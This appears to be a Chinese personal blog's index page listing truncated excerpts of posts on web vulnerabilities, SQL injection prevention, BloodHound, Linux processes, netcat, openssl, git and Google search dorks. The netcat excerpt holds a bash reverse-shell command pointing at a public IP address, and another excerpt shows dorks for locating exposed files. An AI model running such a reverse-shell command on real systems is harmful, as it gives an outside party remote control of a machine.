ssrf、csrf和xss漏洞
ssrf SSRF利用了服务器端应用程序对外部资源的访问功能,攻击者可以指定请求的目标URL,并在服… 阅读更多 »ssrf、csrf和xss漏洞
jiujiuyao
SQL注入原理与预防(一)
参数化查询 <?php // 获取用户输入的关键字 $keyword = $_GET[… 阅读更多 »SQL注入原理与预防(一)
python开启http服务
python3 -m http.server 80
BloodHound安装与使用
github下载(有毒,放在虚拟机中运行) 虚拟机中安装neo4j数据库 apt install n… 阅读更多 »BloodHound安装与使用
linux进程与进程描述符
# 查看当前bash文件描述符 ll /proc/$$/fd # 查看文件进程id pidof &l… 阅读更多 »linux进程与进程描述符
netcat通信
被控端: bash -i >& /dev/tcp/47.101.214.85/6666… 阅读更多 »netcat通信
openssl进程通信
服务端(192.168.22.22) openssl req -x509 -newkey rsa:4… 阅读更多 »openssl进程通信
git 命令
要将代码提交到 GitHub,您可以按照以下步骤操作: 创建 GitHub 账号:如果您还没有 Gi… 阅读更多 »git 命令
谷歌信息收集语法
site:domain.com filetype:xls|doc|pdf site:domain.c… 阅读更多 »谷歌信息收集语法
top命令
列名 含义 PID 进程id USER 进程所有者的用户名 PR 优先级 NI nice值。负值表示… 阅读更多 »top命令